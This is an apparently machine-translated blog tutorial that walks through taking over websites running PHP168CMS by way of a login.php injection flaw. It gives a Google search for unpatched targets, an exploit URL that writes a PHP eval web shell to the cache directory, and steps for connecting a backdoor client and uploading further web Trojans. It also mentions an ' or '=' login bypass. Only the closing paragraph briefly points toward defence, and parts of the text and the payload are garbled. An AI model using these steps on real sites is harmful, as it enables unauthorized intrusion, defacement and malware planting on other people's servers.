Use a login file to inject a bug to the Web page to hang a horse

This article is very simple to operate, follow the instructions in one step, you can complete. Many websites in the background login box input ' or ' = ' code can directly login to the site backstage, this way was the most popular intrusion mode, and today Lu Songsong is about how to use login background login file Vulnerability injection code.

login.php (. asp/.aspx) file is generally used as the administrator of the CMS system in the background landing files, here to Php168cms system for example, login.php Vulnerability in fact an injection vulnerability, is the use of poor file code design directly to the malicious code directly uploaded to the site directory. This vulnerability can be used to enter the Web site, the implementation of content, Web page hanging horse and other means.

The first step is to find a website that uses PHP168CMS

Enter "Powered by php168" in Google, and then feel free to find a website as a test, primarily to find a site that is not patched. Then enter after the domain name, example:http://lusongsong.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache& Content=<?php%[email protected] ($_post[cmd]);? > If a login interface is present, the vulnerability is successfully exploited. (In the text of the invasion domain name, please replace the search site domain name)

Second step, read the site directory, get the absolute path of the website

If the code executes successfully, the Trojan will be saved in the cache\shell.php file, then download a "Lanker Mini PHP Backdoor Client", enter http://lusongsong.com/cache/in the Trojan address bar shell.php, and then choose to read the directory, if the connection is successful, you can display the absolute path on the server where the site resides.

Step three, start uploading PHP Web Trojan

In the basic features list of the Lanker mini PHP backdoor, select Upload Web Trojan, and the uploaded file will be saved in the cache directory. After the domain name enter "cache/website Trojan file name" can run Trojan, at this point already to use PHP168CMS system's website obtains the control right, can modify and delete arbitrarily.

In fact, there is login injection vulnerability more than PHP168, there are many unknown PHP website source code has this loophole, if you are using a PHP system, please quickly detect your program whether there is this problem it. For the PHP language does not understand the webmaster can use the PHP Injection Vulnerability scanning Tool to scan your site, such as: CASI, Php-mysql Injection Analyzer, ZBSI and other tools. A more detailed way to Google: "How to prevent and detect the Web page hanging horse."